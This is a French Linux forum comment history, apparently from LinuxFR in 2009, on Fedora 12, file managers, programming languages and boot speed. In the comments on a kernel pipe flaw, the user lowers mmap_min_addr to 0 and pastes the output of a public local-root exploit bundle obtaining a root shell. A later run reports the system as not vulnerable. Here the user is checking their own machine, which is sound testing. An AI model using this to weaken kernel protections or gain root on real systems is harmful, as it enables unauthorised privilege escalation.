En tout cas, ce 'bug' m'a sauvé mon upgrade Fedora 11 -> rawhide (Fedora 12 beta).
J'avais un conflit sur une dépendance de sudo (je ne le savais pas) et je l'ai temporairement désinstallée pour la réinstaller plus tard. le seul problème, je n'avais aucune console root ouverte et travaillait avec des commandes "sudo yum ..."
Bien sûr, le sudo suivant a échoué.
su ne marchait pas non plus
login, et les consoles texte, ne pas en parler
J'ai finalement pu créer un paquet RPM avec les fichiers qui manquaient (téléchargés de rpmfind.net) et l'ai installé en utilisant PackageKit.
Ce que j'aime bien c'est le fait qu'une fenêtre représente un dossier. Sa taille et son emplacement à l'écran est sauvegardée en fonction du dossier. Cela permet pour certains dossier qui n'ont que deux éléments d'avoir une fenêtre petite, et pour les gros dossiers d'avoir une grosse fenêtre.
Maintenant, je n'aime pas travailler avec les fenêtres en plein écran. souvent, je vais chercher les fenêtres sous les autres au lieu d'utiliser la barre des tâches. Et j'utilise beaucoup le glisser-déposer. Pouvoir placer plusieurs fenêtres est primordial.
Et maintenant, pour aller plus vite dans la navigation des dossiers, j'ai trois choix:
- les bookmarks
- Le Ctrl-L qui permet de saisir un chemin (avec auto complétion)
- lancer nautilus depuis un terminal (avec F12 je vois le dossier courant, zsh peut faire ça)
Pour limiter le nombre de fenêtres à l'écran, j'utilise le clic-milieu pour ouvrir les dossiers. Et comme ça je peux choisir ce que je garde et ce que je ferme très facilement.
A vrai dire, je suppose que c'est plus une question d'habitude. J'ai commencé avec MacOS 7 qui avait ce comportement. Je n'ai presque jamais utilisé le copier/coller sur les fichiers par exemple alors que je vois que pour beaucoup c'est presque l'unique manière de copier ou déplacer des fichiers.
Et enfin, je n'aime pas naviguer dans l'arborescence. Lorsque j'ai trouvé le dossier que je veux, soit je laisse une fenêtre, soit un terminal ouvert dans ce dossier. Je navigue dans les dossiers au début de ma session de travail, et ensuite c'est fini.
Je n'aime tellement pas naviguer dans les fichiers que souvent, pour la boîte de dialogue ouvrir/enregistrer-sous de GNOME, je fais un glisser déplacer du dossier que je veux au milieu de la boîte de dialogue, et ça m'amène directement au dossier que je veux. Et lorsque j'ai une application KDE qui ne fonctionne pas comme ça, (je suis obligée de naviguer dans les dossiers), je n'aime pas du tout.
Mais je me débrouille pour que ça n'arrive pas, j'ouvre à partir du dossier (et non pas fichier->ouvrir), je crée le document avec nautilus en copiant un template (~/Templates) et j'enregistre dans le même fichier (ou un autre fichier dans le même répertoire).
J'espère que ça t'éclaire sur d'autres habitudes de fonctionner
En l'occurrence, ce choix par défait est mon choix par défaut aussi alors ... La seule chose que je peux dire c'est que les avis divergent, et que de toute façon, l'un a-ou l'autre fera des mécontents. Et des contents (dont je fais partie :)
Un music store fourni pour les utilisateurs de Linux avec des codecs libres (ogg vorbis, flac), ça ne me déplairait pas le moins du monde. Et si ça peut financer Canonical, je ne vois pas le problème.
Maintenant, j'utilise Fedora justement, donc ça me touche de moins près. En tout cas, je trouve que c'est une bonne distribution, à jour des nouveautés. En plus, Fedora innove, et c'est sensible.
Le seul petit problème que je peux voir c'est que les logiciels brevetés sont accessibles uniquement via rpmfusion qui est vraiment un projet à part. Ce n'est pas un grand problème, mais lorsque les mp3 ne marche plus, on va vite voir comment faire.
Je sais que les brevets logiciels c'est mal, et c'est bien pour ça que je profite au maximum du fait que ca n'existe pas en France.
Au final, j'ai l'impression que cette distribution est peu utilisée, et je ne vois pas pourquoi, elle est d'une très bonne qualité et je la trouve beaucoup moins complexe que Debian. Parfois j'ai l'impression que Debian choisit toujours la manière la plus complexe de résoudre un problème...
L'intention est louable mais le problème c'est que ton code est illisible. Sans parenthèses je me demande toujours si je doit comprendre (45020089/8)! ou bien 45020089/(8!). Et le fait de pouvoir spécifier la priorité de ces opérateurs de manière différente suivant le type de données manipulée rend les choses encore pire.
Quand je vois les horreurs qui sont fait avec la surcharge des opérateurs en C++, je n'imagine même pas à quoi on finira pas arriver en Lisaac.
On ne peux pas en Lisaac mélanger des opérateurs avec des types différents. Le compilateur ne s'en sort plus sinon.
Le GC est désactivable, et pour donner un exemple, il est désactivé dans le code du compilateur, au profit d'une gestion à la main assez rigoureuse. Comme tout est en lib, on peut tout à fait définir le delete de c++.
Dans GNOME, les affichages pour quand on change la luminosité ou le volume correspondent exactement à ce que tu cherche. Par contre je ne sais pas si ils ont utilisé une bibliothèque spécifique, et si oui, laquelle.
A mon avis, ça doit se trouver quelque part dans metacity, mais je dois avouer n'avoir aucune idée sur la question.
Sinon, il y a libaosd [http://hg.atheme.org/libaosd/] que j'ai utilisée il y a un moment, mais je crois qu'elle est opaque à la souris :( En tout cas, c'est déjà bien mieux que xosd.
Et l'exploit fonctionne, avec un joli message qui moque SELinux, et j'ai un shell root.
$ ./run_null_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
[+] MAPPED ZERO PAGE!
Choose your exploit:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
[2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
[3] Powerglove: Linux 2.6.31 perf_counter local root
[4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[5] CVE-2009-2267: VMWare vm86 guest local root
[6] Wunderbar Emporium: Linux 2.X sendpage() local root
[7] Exit
> 1
------------------------------------------------------------------------------
With people of limited ability modesty is merely honesty. But with those
who possess real talent it is hypocrisy. --Schopenhauer
------------------------------------------------------------------------------
[+] Resolved ima_audit to 0xc0acd58c
[+] Resolved ima_file_mmap to 0xc057da68
[+] Resolved ima_bprm_check to 0xc057da8d
[+] Resolved ima_path_check to 0xc057d742
[+] Resolved selinux_enforcing to 0xc0acb1f8
[+] Resolved selinux_enabled to 0xc097232c
[+] Resolved security_ops to 0xc0aca1cc
[+] Resolved default_security_ops to 0xc0971e4c
[+] Resolved sel_read_enforce to 0xc05714a3
[+] Resolved audit_enabled to 0xc0a6e46c
[+] Resolved commit_creds to 0xc0455765
[+] Resolved prepare_kernel_cred to 0xc04555c6
[+] Using newer pipe_inode_info layout
[+] We'll let this go for a while if needed...
[+] got ring0!
[+] detected cred support
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
...
(GConf errors)
...
sh-4.0# id
uid=0(root) gid=0(root)
sh-4.0# exit
Et je ne pense pas que PulseAudio ait grand chose a voir avec cet exploit, il me semble qu'il s'agit d'autre chose.
Maintenant: $ sudo sh -c 'echo 4096 > /proc/sys/vm/mmap_min_addr'
Suer une Fedora 12 (rawhide pour le moment) à jour de ce matin:
./run_null_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
./run_nonnull_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
Choose your exploit:
[0] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
[1] Exit
> 0
------------------------------------------------------------------------------
Before the Law stands a doorkeeper. To this doorkeeper there comes a man
from the country who begs for admittance to the Law. But the doorkeeper
says that he cannot admit the man at the moment. The man, on reflection,
asks if he will be allowed, then, to enter later. 'It is possible,' answers
the doorkeeper, 'but not at this moment.' Since the door leading into the
Law stands open as usual and the doorkeeper steps to one side, the man bends
down to peer through the entrance. When the doorkeeper sees that, he laughs
and says: 'If you are so strongly tempted, try to get in without my
permission. But note that I am powerful. And I am only the lowest
doorkeeper. From hall to hall, keepers stand at every door, one more
powerful than the other. And the sight of the third man is already more
than even I can stand.' These are difficulties which the man from the
country has not expected to meet, the Law, he thinks, should be accessible
to every man and at all times, but when he looks more closely at the
doorkeeper in his furred robe, with his huge, pointed nose and long, thin,
Tartar beard, he decides that he had better wait until he gets permission to
enter. The doorkeeper gives him a stool and lets him sit down at the side
of the door. There he sits waiting for days and years. He makes many
attempts to be allowed in and wearies the doorkeeper with his importunity.
The doorkeeper often engages him in brief conversation, asking him about his
home and about other matters, but the questions are put quite impersonally,
as great men put questions, and always conclude with the statement that the
man cannot be allowed to enter yet. The man, who has equipped himself with
many things for his journey, parts with all he has, however valuable, in the
hope of bribing the doorkeeper. The doorkeeper accepts it all, saying,
however, as he takes each gift: 'I take this only to keep you from feeling
that you have left something undone.' During all these long years the man
watches the doorkeeper almost incessantly. He forgets about the other
doorkeepers, and this one seems to him the only barrier between himself and
the Law. In the first years he curses his evil fate aloud; later, as he
grows old, he only mutters to himself. He grows childish, and since in his
prolonged study of the doorkeeper he has learned to know even the fleas in
his fur collar, he begs the very fleas to help him and to persuade the
doorkeeper to change his mind. Finally his eyes grow dim and he does not
know whether the world is really darkening around him or whether his eyes
are only deceiving him. But in the darkness he can now perceive a radiance
that streams inextinguishably from the door of the Law. Now his life is
drawing to a close. Before he dies, all that he has experienced during the
whole time of his sojourn condenses in his mind into one question, which he
has never yet put to the doorkeeper. He beckons the doorkeeper, since he
can no longer raise his stiffening body. The doorkeeper has to bend far
down to hear him, for the difference in size between them has increased very
much to the man's disadvantage. 'What do you want to know now?' asks the
doorkeeper, 'you are insatiable.' 'Everyone strives to attain the Law,'
answers the man, 'how does it come about, then, that in all these years no
one has come seeking admittance but me?' The doorkeeper perceives that the
man is nearing his end and his hearing is failing, so he bellows in his ear:
'No one but you could gain admittance through this door, since this door was
intended for you. I am now going to shut it.' --Kafka
------------------------------------------------------------------------------
[+] Resolved ima_audit to 0xc0acd58c
[+] Resolved ima_file_mmap to 0xc057da68
[+] Resolved ima_bprm_check to 0xc057da8d
[+] Resolved ima_path_check to 0xc057d742
[+] Resolved selinux_enforcing to 0xc0acb1f8
[+] Resolved selinux_enabled to 0xc097232c
[+] Resolved security_ops to 0xc0aca1cc
[+] Resolved default_security_ops to 0xc0971e4c
[+] Resolved sel_read_enforce to 0xc05714a3
[+] Resolved audit_enabled to 0xc0a6e46c
[+] Resolved commit_creds to 0xc0455765
[+] Resolved prepare_kernel_cred to 0xc04555c6
System is not vulnerable.
Et depuis que Fedora gère KMS (Kernel ModeSetting) sur mon mac, j'ai presque la même chose sous Linux, le retour du suspend-to-ram est très rapide.
Le seul inconvénient que je vois, c'est que NetworkManager s'est déconnecté, et prend un temps pour se reconnecter.
Je suppose qu'avec Mac OS X, le wifi est aussi déconnecté, mais au réveil l'OS se considère connecté et les paquets sont mis en attente, tant que le wifi n'est pas réellement reconnecté. Ce serait bien d'avoir la même chose chez nous.
En tout cas, j'hésite beaucoup moins à faire un suspend-to-ram pour me déplacer avec mon ordinateur.
Ce ne serait pas par hasard un fsck qui vérifie ton disque ?
Sinon, tu peux regarder les messages en console (je pense que Esc doit effacer le splash screen pour afficher la console, a l'époque où j'ai utilisé Ubuntu, ça marchait comme ça). Et tu devrais voir où ça bloque.
Si, j'avais la barre bleue et blanche, je ne savais pas que c'était plymouth. Mais je suis bien d'accord, c'est entièrement suffisant si on a pas des pilotes compatibles KMS.
Et pour EFI, je pense que même si ça n'intervient pas directement avec KMS, ça devait jouer un peu. A l'époque de la sortie de Fedora 11 j'avais testé grandement plusieurs configurations différentes, et ça semblait être corrélé.
Mais maintenant, ça marche bien. Et j'aime bien Fedora pour ça, ils sont très proche de l'upstream.
( et puis, avoir moins de 10s de boot, faut passer par coreboot amha, sinon ç'est relativement dur, mais je vois pas Canonical faire reflasher le bios des utilisateurs ).
Je pense qu'ils visent 10 secondes une fois que le BIOS ou GRUB a fini son travail.
Bon, j'ai posté avant d'avoir tout lu, honte à moi
Je ne sais pas comment fonctionne exactement xsplash, mais si je me fie à ta description, ça ressemble drôlement à RHGB qui était lent, lourd et une impasse.
En l'occurence, Xsplash n'est pas du tout pareil que RHGB. Xsplash utilise le même serveur X du début à la fin. RHGB démarrait un serveur X rien que pour le splash screen, puis l'arrêtait et démarrait le serveur X pour le login et la session.
En l'occurence, c'est depuis hier et ma mist à jour Fedora 11 -> Fedora 12ß que j'ai pu goûter à plymouth, avant j'avais la console.
mais en même temps, c'est sans doute dû au fait que jusqu'à dernièrement, ma carte intel ne fonctionnait pas avec KMS (peut être parce que j'ai EFI sur ma machine, et le BIOS était émulé)
Il faut rappeler que Gnome-Shell c'est pour Gnome 3.
Avec Fedora, j'ai la possibilité d'activer Gnome-Shell, mais on voit bien que c'est encore en plein développement. Par exemple, aucun raccourci clavier n'est configurable (et avec mon clavier un tout petit peu particulier, ça veut dire que je n'ai pas du tout de raccourci clavier).
On peut noter aussi la disparition de la gravure via
Nautilus dans cette nouvelle version de Gnome.
Qui utilisait ça ? franchement ?
(moi jamais ... depuis la 5.04)
Je ne grave pas souvent, mais quand je grave un disque de données, c'est le suel outil dont j'avais besoin. Je n'ai pas encore eu l'occasion de graver mais j'espère que la nouvelle manière de faire est aussi simple.
[^] # Re: Au moins avec Fedora 12
Posté par Mildred (site web personnel) . En réponse à la dépêche Fedora 12 « Constantine » est disponible. Évalué à 2.
J'avais un conflit sur une dépendance de sudo (je ne le savais pas) et je l'ai temporairement désinstallée pour la réinstaller plus tard. le seul problème, je n'avais aucune console root ouverte et travaillait avec des commandes "sudo yum ..."
Bien sûr, le sudo suivant a échoué.
su ne marchait pas non plus
login, et les consoles texte, ne pas en parler
J'ai finalement pu créer un paquet RPM avec les fichiers qui manquaient (téléchargés de rpmfind.net) et l'ai installé en utilisant PackageKit.
Et sudo fonctionnait a nouveau :)
[^] # Re: Switch
Posté par Mildred (site web personnel) . En réponse à la dépêche Fedora 12 « Constantine » est disponible. Évalué à 3.
Maintenant, je n'aime pas travailler avec les fenêtres en plein écran. souvent, je vais chercher les fenêtres sous les autres au lieu d'utiliser la barre des tâches. Et j'utilise beaucoup le glisser-déposer. Pouvoir placer plusieurs fenêtres est primordial.
Et maintenant, pour aller plus vite dans la navigation des dossiers, j'ai trois choix:
- les bookmarks
- Le Ctrl-L qui permet de saisir un chemin (avec auto complétion)
- lancer nautilus depuis un terminal (avec F12 je vois le dossier courant, zsh peut faire ça)
Pour limiter le nombre de fenêtres à l'écran, j'utilise le clic-milieu pour ouvrir les dossiers. Et comme ça je peux choisir ce que je garde et ce que je ferme très facilement.
A vrai dire, je suppose que c'est plus une question d'habitude. J'ai commencé avec MacOS 7 qui avait ce comportement. Je n'ai presque jamais utilisé le copier/coller sur les fichiers par exemple alors que je vois que pour beaucoup c'est presque l'unique manière de copier ou déplacer des fichiers.
Et enfin, je n'aime pas naviguer dans l'arborescence. Lorsque j'ai trouvé le dossier que je veux, soit je laisse une fenêtre, soit un terminal ouvert dans ce dossier. Je navigue dans les dossiers au début de ma session de travail, et ensuite c'est fini.
Je n'aime tellement pas naviguer dans les fichiers que souvent, pour la boîte de dialogue ouvrir/enregistrer-sous de GNOME, je fais un glisser déplacer du dossier que je veux au milieu de la boîte de dialogue, et ça m'amène directement au dossier que je veux. Et lorsque j'ai une application KDE qui ne fonctionne pas comme ça, (je suis obligée de naviguer dans les dossiers), je n'aime pas du tout.
Mais je me débrouille pour que ça n'arrive pas, j'ouvre à partir du dossier (et non pas fichier->ouvrir), je crée le document avec nautilus en copiant un template (~/Templates) et j'enregistre dans le même fichier (ou un autre fichier dans le même répertoire).
J'espère que ça t'éclaire sur d'autres habitudes de fonctionner
[^] # Re: Switch
Posté par Mildred (site web personnel) . En réponse à la dépêche Fedora 12 « Constantine » est disponible. Évalué à 2.
[^] # Re: Switch
Posté par Mildred (site web personnel) . En réponse à la dépêche Fedora 12 « Constantine » est disponible. Évalué à 4.
[^] # Re: Switch
Posté par Mildred (site web personnel) . En réponse à la dépêche Fedora 12 « Constantine » est disponible. Évalué à 8.
Maintenant, j'utilise Fedora justement, donc ça me touche de moins près. En tout cas, je trouve que c'est une bonne distribution, à jour des nouveautés. En plus, Fedora innove, et c'est sensible.
Le seul petit problème que je peux voir c'est que les logiciels brevetés sont accessibles uniquement via rpmfusion qui est vraiment un projet à part. Ce n'est pas un grand problème, mais lorsque les mp3 ne marche plus, on va vite voir comment faire.
Je sais que les brevets logiciels c'est mal, et c'est bien pour ça que je profite au maximum du fait que ca n'existe pas en France.
Au final, j'ai l'impression que cette distribution est peu utilisée, et je ne vois pas pourquoi, elle est d'une très bonne qualité et je la trouve beaucoup moins complexe que Debian. Parfois j'ai l'impression que Debian choisit toujours la manière la plus complexe de résoudre un problème...
[^] # Re: Ah! C'est la saison de la galinette cendrée!
Posté par Mildred (site web personnel) . En réponse au journal Go : Un nouveau langage chez Google. Évalué à 1.
[^] # Re: Ah! C'est la saison de la galinette cendrée!
Posté par Mildred (site web personnel) . En réponse au journal Go : Un nouveau langage chez Google. Évalué à 3.
Quand je vois les horreurs qui sont fait avec la surcharge des opérateurs en C++, je n'imagine même pas à quoi on finira pas arriver en Lisaac.
On ne peux pas en Lisaac mélanger des opérateurs avec des types différents. Le compilateur ne s'en sort plus sinon.
[^] # Re: Ah! C'est la saison de la galinette cendrée!
Posté par Mildred (site web personnel) . En réponse au journal Go : Un nouveau langage chez Google. Évalué à 2.
Le GC est désactivable, et pour donner un exemple, il est désactivé dans le code du compilateur, au profit d'une gestion à la main assez rigoureuse. Comme tout est en lib, on peut tout à fait définir le delete de c++.
Le GC ne marche plus du tout en fait.
[^] # Re: Certaines choses bizarres
Posté par Mildred (site web personnel) . En réponse au journal Go : Un nouveau langage chez Google. Évalué à 2.
http://live.gnome.org/GObjectIntrospection/
[^] # Re: GNOME
Posté par Mildred (site web personnel) . En réponse au message Affichage OSD. Évalué à 3.
Peut être même ici: http://git.gnome.org/cgit/gnome-settings-daemon/tree/plugins(...) (gsd-media-keys-window.[ch])
tu dois pouvoir copier le code.
# GNOME
Posté par Mildred (site web personnel) . En réponse au message Affichage OSD. Évalué à 3.
A mon avis, ça doit se trouver quelque part dans metacity, mais je dois avouer n'avoir aucune idée sur la question.
Sinon, il y a libaosd [http://hg.atheme.org/libaosd/] que j'ai utilisée il y a un moment, mais je crois qu'elle est opaque à la souris :( En tout cas, c'est déjà bien mieux que xosd.
[^] # Re: Brad a publié son exploit
Posté par Mildred (site web personnel) . En réponse à la dépêche Faille locale dans les fonctions pipe_*_open() du noyau Linux. Évalué à 2.
Linux kylae 2.6.31.5-96.fc12.i686.PAE #1 SMP Fri Oct 23 19:39:36 EDT 2009 i686 i686 i386 GNU/Linux
[^] # Re: encore et toujours la meme faille (ou presque)
Posté par Mildred (site web personnel) . En réponse à la dépêche Faille locale dans les fonctions pipe_*_open() du noyau Linux. Évalué à 2.
[^] # Re: Brad a publié son exploit
Posté par Mildred (site web personnel) . En réponse à la dépêche Faille locale dans les fonctions pipe_*_open() du noyau Linux. Évalué à 3.
Maintenant si
$ sudo sh -c 'echo 0 > /proc/sys/vm/mmap_min_addr'
$ cat /proc/sys/vm/mmap_min_addr
0
Et l'exploit fonctionne, avec un joli message qui moque SELinux, et j'ai un shell root.
$ ./run_null_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
[+] MAPPED ZERO PAGE!
Choose your exploit:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
[2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
[3] Powerglove: Linux 2.6.31 perf_counter local root
[4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[5] CVE-2009-2267: VMWare vm86 guest local root
[6] Wunderbar Emporium: Linux 2.X sendpage() local root
[7] Exit
> 1
------------------------------------------------------------------------------
With people of limited ability modesty is merely honesty. But with those
who possess real talent it is hypocrisy. --Schopenhauer
------------------------------------------------------------------------------
[+] Resolved ima_audit to 0xc0acd58c
[+] Resolved ima_file_mmap to 0xc057da68
[+] Resolved ima_bprm_check to 0xc057da8d
[+] Resolved ima_path_check to 0xc057d742
[+] Resolved selinux_enforcing to 0xc0acb1f8
[+] Resolved selinux_enabled to 0xc097232c
[+] Resolved security_ops to 0xc0aca1cc
[+] Resolved default_security_ops to 0xc0971e4c
[+] Resolved sel_read_enforce to 0xc05714a3
[+] Resolved audit_enabled to 0xc0a6e46c
[+] Resolved commit_creds to 0xc0455765
[+] Resolved prepare_kernel_cred to 0xc04555c6
[+] Using newer pipe_inode_info layout
[+] We'll let this go for a while if needed...
[+] got ring0!
[+] detected cred support
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
...
(GConf errors)
...
sh-4.0# id
uid=0(root) gid=0(root)
sh-4.0# exit
Et je ne pense pas que PulseAudio ait grand chose a voir avec cet exploit, il me semble qu'il s'agit d'autre chose.
Maintenant:
$ sudo sh -c 'echo 4096 > /proc/sys/vm/mmap_min_addr'[^] # Re: Brad a publié son exploit
Posté par Mildred (site web personnel) . En réponse à la dépêche Faille locale dans les fonctions pipe_*_open() du noyau Linux. Évalué à 2.
./run_null_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
./run_nonnull_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
Choose your exploit:
[0] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
[1] Exit
> 0
------------------------------------------------------------------------------
Before the Law stands a doorkeeper. To this doorkeeper there comes a man
from the country who begs for admittance to the Law. But the doorkeeper
says that he cannot admit the man at the moment. The man, on reflection,
asks if he will be allowed, then, to enter later. 'It is possible,' answers
the doorkeeper, 'but not at this moment.' Since the door leading into the
Law stands open as usual and the doorkeeper steps to one side, the man bends
down to peer through the entrance. When the doorkeeper sees that, he laughs
and says: 'If you are so strongly tempted, try to get in without my
permission. But note that I am powerful. And I am only the lowest
doorkeeper. From hall to hall, keepers stand at every door, one more
powerful than the other. And the sight of the third man is already more
than even I can stand.' These are difficulties which the man from the
country has not expected to meet, the Law, he thinks, should be accessible
to every man and at all times, but when he looks more closely at the
doorkeeper in his furred robe, with his huge, pointed nose and long, thin,
Tartar beard, he decides that he had better wait until he gets permission to
enter. The doorkeeper gives him a stool and lets him sit down at the side
of the door. There he sits waiting for days and years. He makes many
attempts to be allowed in and wearies the doorkeeper with his importunity.
The doorkeeper often engages him in brief conversation, asking him about his
home and about other matters, but the questions are put quite impersonally,
as great men put questions, and always conclude with the statement that the
man cannot be allowed to enter yet. The man, who has equipped himself with
many things for his journey, parts with all he has, however valuable, in the
hope of bribing the doorkeeper. The doorkeeper accepts it all, saying,
however, as he takes each gift: 'I take this only to keep you from feeling
that you have left something undone.' During all these long years the man
watches the doorkeeper almost incessantly. He forgets about the other
doorkeepers, and this one seems to him the only barrier between himself and
the Law. In the first years he curses his evil fate aloud; later, as he
grows old, he only mutters to himself. He grows childish, and since in his
prolonged study of the doorkeeper he has learned to know even the fleas in
his fur collar, he begs the very fleas to help him and to persuade the
doorkeeper to change his mind. Finally his eyes grow dim and he does not
know whether the world is really darkening around him or whether his eyes
are only deceiving him. But in the darkness he can now perceive a radiance
that streams inextinguishably from the door of the Law. Now his life is
drawing to a close. Before he dies, all that he has experienced during the
whole time of his sojourn condenses in his mind into one question, which he
has never yet put to the doorkeeper. He beckons the doorkeeper, since he
can no longer raise his stiffening body. The doorkeeper has to bend far
down to hear him, for the difference in size between them has increased very
much to the man's disadvantage. 'What do you want to know now?' asks the
doorkeeper, 'you are insatiable.' 'Everyone strives to attain the Law,'
answers the man, 'how does it come about, then, that in all these years no
one has come seeking admittance but me?' The doorkeeper perceives that the
man is nearing his end and his hearing is failing, so he bellows in his ear:
'No one but you could gain admittance through this door, since this door was
intended for you. I am now going to shut it.' --Kafka
------------------------------------------------------------------------------
[+] Resolved ima_audit to 0xc0acd58c
[+] Resolved ima_file_mmap to 0xc057da68
[+] Resolved ima_bprm_check to 0xc057da8d
[+] Resolved ima_path_check to 0xc057d742
[+] Resolved selinux_enforcing to 0xc0acb1f8
[+] Resolved selinux_enabled to 0xc097232c
[+] Resolved security_ops to 0xc0aca1cc
[+] Resolved default_security_ops to 0xc0971e4c
[+] Resolved sel_read_enforce to 0xc05714a3
[+] Resolved audit_enabled to 0xc0a6e46c
[+] Resolved commit_creds to 0xc0455765
[+] Resolved prepare_kernel_cred to 0xc04555c6
System is not vulnerable.
[^] # Re: Ha.
Posté par Mildred (site web personnel) . En réponse au journal TuxRadar : Comparaison de la vitesse de démarrage de Vista, Windows 7, Ubuntu 9.04 et 9.10. Évalué à 4.
Le seul inconvénient que je vois, c'est que NetworkManager s'est déconnecté, et prend un temps pour se reconnecter.
Je suppose qu'avec Mac OS X, le wifi est aussi déconnecté, mais au réveil l'OS se considère connecté et les paquets sont mis en attente, tant que le wifi n'est pas réellement reconnecté. Ce serait bien d'avoir la même chose chez nous.
En tout cas, j'hésite beaucoup moins à faire un suspend-to-ram pour me déplacer avec mon ordinateur.
[^] # Re: Cauchemar de regexps
Posté par Mildred (site web personnel) . En réponse au journal L'internationalisation des adresses internet. Évalué à 2.
http://linuxfr.org/comments/943583.html#943583
http://www.linuxjournal.com/article/9585
[^] # Re: Tout ça est très lent et pas de mon gout
Posté par Mildred (site web personnel) . En réponse à la dépêche Sortie d'Ubuntu 9.10 : Karmic Koala. Évalué à 2.
[^] # Re: C'est lent à booter !
Posté par Mildred (site web personnel) . En réponse à la dépêche Sortie d'Ubuntu 9.10 : Karmic Koala. Évalué à 2.
Sinon, tu peux regarder les messages en console (je pense que Esc doit effacer le splash screen pour afficher la console, a l'époque où j'ai utilisé Ubuntu, ça marchait comme ça). Et tu devrais voir où ça bloque.
C'est peut être simplement un timeout réseau
[^] # Re: On est vendredi !!!!!!!!!!!
Posté par Mildred (site web personnel) . En réponse à la dépêche Sortie d'Ubuntu 9.10 : Karmic Koala. Évalué à 4.
Et pour EFI, je pense que même si ça n'intervient pas directement avec KMS, ça devait jouer un peu. A l'époque de la sortie de Fedora 11 j'avais testé grandement plusieurs configurations différentes, et ça semblait être corrélé.
Mais maintenant, ça marche bien. Et j'aime bien Fedora pour ça, ils sont très proche de l'upstream.
[^] # Re: On est vendredi !!!!!!!!!!!
Posté par Mildred (site web personnel) . En réponse à la dépêche Sortie d'Ubuntu 9.10 : Karmic Koala. Évalué à 4.
Je pense qu'ils visent 10 secondes une fois que le BIOS ou GRUB a fini son travail.
Sinon, c'est trop dépendant du hardware
[^] # Re: On est vendredi !!!!!!!!!!!
Posté par Mildred (site web personnel) . En réponse à la dépêche Sortie d'Ubuntu 9.10 : Karmic Koala. Évalué à 3.
Je ne sais pas comment fonctionne exactement xsplash, mais si je me fie à ta description, ça ressemble drôlement à RHGB qui était lent, lourd et une impasse.
En l'occurence, Xsplash n'est pas du tout pareil que RHGB. Xsplash utilise le même serveur X du début à la fin. RHGB démarrait un serveur X rien que pour le splash screen, puis l'arrêtait et démarrait le serveur X pour le login et la session.
[^] # Re: On est vendredi !!!!!!!!!!!
Posté par Mildred (site web personnel) . En réponse à la dépêche Sortie d'Ubuntu 9.10 : Karmic Koala. Évalué à 2.
mais en même temps, c'est sans doute dû au fait que jusqu'à dernièrement, ma carte intel ne fonctionnait pas avec KMS (peut être parce que j'ai EFI sur ma machine, et le BIOS était émulé)
[^] # Re: GDM
Posté par Mildred (site web personnel) . En réponse à la dépêche Sortie d'Ubuntu 9.10 : Karmic Koala. Évalué à 2.
Avec Fedora, j'ai la possibilité d'activer Gnome-Shell, mais on voit bien que c'est encore en plein développement. Par exemple, aucun raccourci clavier n'est configurable (et avec mon clavier un tout petit peu particulier, ça veut dire que je n'ai pas du tout de raccourci clavier).
Ceci dit, c'est très prometteur.
[^] # Re: GDM
Posté par Mildred (site web personnel) . En réponse à la dépêche Sortie d'Ubuntu 9.10 : Karmic Koala. Évalué à 2.
On peut noter aussi la disparition de la gravure via
Nautilus dans cette nouvelle version de Gnome.
Qui utilisait ça ? franchement ?
(moi jamais ... depuis la 5.04)
Je ne grave pas souvent, mais quand je grave un disque de données, c'est le suel outil dont j'avais besoin. Je n'ai pas encore eu l'occasion de graver mais j'espère que la nouvelle manière de faire est aussi simple.